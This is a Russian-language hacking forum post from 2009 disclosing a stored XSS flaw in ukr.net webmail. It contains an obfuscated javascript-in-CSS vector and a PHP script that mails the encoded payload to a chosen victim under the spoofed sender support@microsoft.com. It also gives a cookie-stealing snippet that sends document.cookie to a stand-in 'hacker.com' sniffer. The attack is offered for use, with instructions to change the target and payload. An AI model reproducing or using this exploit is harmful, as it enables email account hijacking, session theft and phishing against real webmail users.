ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Active XSS [ukr.net]
  #1  
Старый 14.05.2009, 23:55
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Active XSS [ukr.net]

Всем привет) На днях исследовал почту ukr.net'a Хотя нет, начну с того что мне жаль было постить это в паблике, так как проверено, быстро пофиксят.

Вообщем смотря сорцы одного из писем, я заметил что контент весь в :

Код:
<script>
	messageBody = '\nPew pew!';
	readmsgSetMessageBody();	
	</script>
Это уже выдвигало на некии мысли. Покопавшись еще чуть я остановился на таком вот векторе:

Код:
<font style="background:url\(javas/**/cript:eval(String.fromCharCode([evil encoded code])))">
Opera: [-]
IE: [+]
FF: [-]

Небольшой скриптик для отправки:
PHP код:
<?php
/**
 * (c) Dimi4, 2009
 * 
*/   
$target "petya@ukr.net";
$subj "Pew pew!";
$payload ="";
$evilcode="alert(1);"//img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
$strlenstrlen($evilcode);
        for(
$i=0$i !== $strlen$i++)
        {
            if(
$i+== $strlen$payload .= ord($evilcode[$i]);
            else 
$payload .= ord($evilcode[$i]).',';
        }
$header  "From: support@microsoft.com\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$msg ='<font style="background:url\(javas/**/cript:eval(String.fromCharCode('.$payload.')))">';
mail($target,$subj,$msg,$header);
?>
Собстна меняем $target на нужное мыло, и $evilcode на ченить хекерское, например имедж со снифером:
Код:
img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Сценарии/CMF/СMS 1 19.09.2009 14:01
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ